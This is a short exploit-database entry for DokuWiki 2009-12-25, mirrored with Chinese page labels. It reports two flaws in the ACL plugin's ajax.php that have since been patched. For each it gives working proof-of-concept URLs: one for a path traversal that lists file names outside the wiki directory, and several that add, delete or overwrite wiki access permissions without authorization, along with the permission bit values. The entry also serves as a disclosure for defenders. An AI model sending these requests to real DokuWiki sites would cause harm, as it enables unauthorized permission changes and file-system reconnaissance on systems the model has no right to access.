dokuwiki 2009-12-25 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： IHTeam
  日期： 2010-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11141/

• Reported:13-01-2010
  Patched:13-01-2010
  Released:14-01-2010
  Vulnerable version : 
  http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25.tgz
  Patched version:
  http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25b.tgz
  Author:white_sheep
  Contact:white_sheep@ihteam.net - https://www.ihteam.net
  
  --------------------Show Outside Directory
  
  PoC :
  
   http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/
  
   The bug allows listing the names of arbitrary file on the webserver 
  - NOT THEIR CONTENTS.
  
  
  --------------------Arbitrary Change or Delete Wiki Permission
  
  PoC :
  
   
  http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL) 
  
   add to acl.auth.php read or write authorization.
  
   
  http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
   delete from acl.auth.php an eventually authorization like 
  (ACL).
  
   
  http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
   delete from acl.auth.php all authorization like (ACL).
  
   where (ACL) must be:
   1 -> read
   2 -> modified
   4 -> creation
   8 -> upload
   16 -> delete